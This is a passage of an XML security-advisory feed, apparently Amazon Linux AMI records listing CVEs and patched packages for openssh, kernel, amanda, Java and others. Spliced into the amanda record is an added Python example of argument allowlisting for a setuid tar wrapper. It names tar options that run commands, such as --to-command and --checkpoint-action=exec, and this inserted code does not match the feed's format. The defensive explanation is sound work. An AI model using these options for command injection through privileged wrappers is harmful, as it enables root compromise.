</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38559" title="" id="CVE-2023-38559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.29.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.29.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.29.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1802</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1802: important priority package update for openssh</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38408:
The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if the target user's ssh-agent is forwarded to an attacker-controlled system (the code in /usr/lib is not necessarily safe for loading into ssh-agent). Exploitation can also be prevented by starting ssh-agent with an empty PKCS#11/FIDO allowlist (ssh-agent -P '') or by configuring an allowlist that contains only specific provider libraries. NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38408" title="" id="CVE-2023-38408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.80.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="22.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.80.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-cavs-7.4p1-22.80.amzn1.i686.rpm</filename></package><package 
name="openssh-server" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.80.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.80.amzn1.i686.rpm</filename></package><package name="openssh" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-7.4p1-22.80.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="22.80.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-7.4p1-22.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1803</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1803: medium priority package update for kernel</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4128:
A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.
CVE-2023-34319:
A buffer overrun vulnerability was found in the netback driver in Xen due to an unusual split packet. This flaw allows an unprivileged guest to cause a denial of service (DoS) of the host by sending network packets to the backend, causing the backend to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34319" title="" id="CVE-2023-34319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4128" title="" id="CVE-2023-4128" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-headers" 
version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1804</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1804: medium priority package update for openldap</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2953:
A vulnerability was found in openldap that can cause a null pointer dereference in the ber_memalloc_x() function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953" title="" id="CVE-2023-2953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-debuginfo" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.40" release="16.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.40-16.37.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.40" release="16.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/openldap-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.40-16.37.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.40" release="16.37.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.40-16.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1805</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1805: important priority package update for monit</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-26563:
An issue was discovered in Tildeslash Monit before 5.31.0 that allows remote attackers to gain escalated privileges due to improper PAM authorization.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26563" title="" id="CVE-2022-26563" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="monit-debuginfo" version="5.2.5" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/monit-debuginfo-5.2.5-3.12.amzn1.x86_64.rpm</filename></package><package name="monit" version="5.2.5" release="3.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/monit-5.2.5-3.12.amzn1.x86_64.rpm</filename></package><package name="monit" version="5.2.5" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/monit-5.2.5-3.12.amzn1.i686.rpm</filename></package><package name="monit-debuginfo" version="5.2.5" release="3.12.amzn1" epoch="0" arch="i686"><filename>Packages/monit-debuginfo-5.2.5-3.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1806</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1806: important priority package update for GraphicsMagick</title><issued date="2023-08-17 11:39:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1270:
In GraphicsMagick, a heap buffer overflow was found when parsing MIFF.
CVE-2020-21679:
A buffer overflow in the WritePCXImage function in pcx.c in GraphicsMagick 1.4 allows remote attackers to cause a denial of service by converting a crafted image file to PCX format.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21679" title="" id="CVE-2020-21679" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1270" title="" id="CVE-2022-1270" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.38" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.38-1.1.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.38" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.38-1.1.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.38" release="1.1.amzn1" epoch="0" 
arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.38-1.1.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.38" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.38-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1807</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1807: medium priority package update for transfig</title><issued date="2023-08-17 11:39:00" /><updated date="2024-06-07 05:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32280:
An issue was discovered in fig2dev before 3.2.8. A NULL pointer dereference exists in the function compute_closed_spline() located in trans_spline.c. It allows an attacker to cause a denial of service. The fixed version of fig2dev is 3.2.8.
CVE-2020-21684:
A global buffer overflow in the put_font function in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DoS) by converting an xfig file into pict2e format.
CVE-2020-21683:
A global buffer overflow in the shade_or_tint_name_after_declare_color function in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DoS) by converting an xfig file into pstricks format.
CVE-2020-21682:
A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DoS) by converting an xfig file into ge format.
CVE-2020-21681:
A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DoS) by converting an xfig file into ge format.
CVE-2020-21678:
A global buffer overflow in the genmp_writefontmacro_latex component in genmp.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DoS) by converting an xfig file into mp format.
CVE-2019-19797:
An out-of-bounds write flaw was found in transfig in the way the `fig2dev` program handled the processing of Fig format files. Specifically, the flaw affects the translation of Fig code into the box graphics language. An attacker could crash `fig2dev` by tricking it into processing a specially crafted Fig file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797" title="" id="CVE-2019-19797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21678" title="" id="CVE-2020-21678" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21681" title="" id="CVE-2020-21681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21682" title="" id="CVE-2020-21682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21683" title="" id="CVE-2020-21683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21684" title="" id="CVE-2020-21684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32280" title="" id="CVE-2021-32280" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transfig" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/transfig-3.2.7b-10.8.amzn1.x86_64.rpm</filename></package><package name="transfig-debuginfo" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/transfig-debuginfo-3.2.7b-10.8.amzn1.x86_64.rpm</filename></package><package name="transfig" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="i686"><filename>Packages/transfig-3.2.7b-10.8.amzn1.i686.rpm</filename></package><package name="transfig-debuginfo" version="3.2.7b" release="10.8.amzn1" epoch="1" arch="i686"><filename>Packages/transfig-debuginfo-3.2.7b-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1808</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1808: medium priority package update for amanda</title><issued date="2023-08-17 11:39:00" /><updated date="2023-08-23 02:31:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-30577:
AMANDA (Advanced Maryland Automatic Network Disk Archiver) before tag-community-3.5.4 mishandles argument checking for runtar.c, a different vulnerability than CVE-2022-37705.
CVE-2016-10729:
An issue was discovered in Amanda 3.3.1. A user with backup privileges can trivially compromise a client installation. The "runtar" setuid root binary does not check for additional arguments supplied after --create, allowing users to manipulate commands and perform command injection as root.
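The runtar flaw above is a general pattern for setuid wrappers: the wrapper checks the first argument and forwards the rest to a program that will happily execute commands when given the right option. The Python below is an added illustration, not Amanda's runtar and not Amanda's fix: unsafe_build_argv reproduces the pattern the CVE describes, and safe_build_argv replaces it with an allowlist of argument shapes. The option set, the value regexes and the /var/lib/amanda and /tmp/amanda paths are assumptions made for the example.

```python
"""
Argument allowlisting for a privileged tar wrapper, illustrating the class of
flaw described for runtar above. Added example, not Amanda's runtar: the
unsafe function shows the pattern the advisory describes (check --create,
forward everything else), the safe one admits only known argument shapes.
"""
import re

# Each permitted option maps to a regex its value must fully match, or to None
# when it takes no value. The option set and the paths are assumptions for the
# example, not Amanda's real configuration.
OPTION_RULES = {
    "--create": None,
    "--one-file-system": None,
    "--sparse": None,
    "--totals": None,
    ".": None,                                    # the single positional: archive cwd
    "--file": re.compile(r"-"),                   # archive only to stdout
    "--directory": re.compile(r"/[A-Za-z0-9._/-]+"),
    "--listed-incremental": re.compile(r"/var/lib/amanda/gnutar-lists/[A-Za-z0-9._-]+"),
    "--exclude-from": re.compile(r"/tmp/amanda/[A-Za-z0-9._-]+"),
}


def unsafe_build_argv(user_args):
    """The vulnerable pattern: require --create first, forward the rest verbatim.
    Anything GNU tar accepts after that, e.g. --to-command=CMD, --rsh-command=CMD,
    -I PROG or --checkpoint-action=exec=CMD, then runs as root.
    Returns (argv, None) or (None, reason)."""
    args = list(user_args)
    if not args or args[0] != "--create":
        return None, "first argument must be --create"
    return ["tar"] + args, None


def safe_build_argv(user_args):
    """Allowlist every token. Returns (argv, None) or (None, reason).
    A denylist would not do: getopt_long also accepts unambiguous
    abbreviations such as --to-comm, and short options can be bundled."""
    args = list(user_args)
    if not args or args[0] != "--create":
        return None, "first argument must be --create"
    if args[-1] != ".":
        return None, "last argument must be the positional '.'"
    out = ["tar"]
    it = iter(args)
    for tok in it:
        name, sep, value = tok.partition("=")
        if name not in OPTION_RULES:
            return None, "argument not permitted: %r" % tok
        rule = OPTION_RULES[name]
        if rule is None:
            if sep:
                return None, "%s takes no value" % name
            out.append(name)
            continue
        if not sep:
            # value given as the next token; consume it so it is never
            # interpreted as an option of its own
            value = next(it, None)
            if value is None:
                return None, "%s requires a value" % name
        if not rule.fullmatch(value):
            return None, "value rejected for %s: %r" % (name, value)
        out.append(name + "=" + value)
    return out, None
```

The allowlist is deliberately positive: any token not in OPTION_RULES is rejected, so the GNU tar options that run a program (--to-command, --rsh-command, --use-compress-program and its short form -I, --checkpoint-action=exec=...) and getopt_long's abbreviations of them never reach tar. The value regexes are the second half of the check: --listed-incremental and --exclude-from are written or read as root, so their paths are pinned to one directory rather than accepted as given.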
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10729" title="" id="CVE-2016-10729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30577" title="" id="CVE-2023-30577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amanda-server" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-server-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-client" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-client-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-devel" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-devel-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-debuginfo" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-debuginfo-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/amanda-2.6.1p2-8.14.amzn1.x86_64.rpm</filename></package><package name="amanda-debuginfo" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-debuginfo-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-client" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-client-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-devel" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-devel-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda" version="2.6.1p2" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/amanda-2.6.1p2-8.14.amzn1.i686.rpm</filename></package><package name="amanda-server" version="2.6.1p2" release="8.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/amanda-server-2.6.1p2-8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1809</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1809: important priority package update for java-1.8.0-openjdk</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2830:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2805:
A flaw was found in the way the readObject() method of the MethodType class in the Libraries component of OpenJDK checked argument types. This flaw allows an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2020-2803:
A flaw was found in the boundary checks in the java.nio buffer classes in the Libraries component of OpenJDK, where they can be bypassed in certain cases. This flaw allows an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2020-2800:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
CVE-2020-2781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2020-2773:
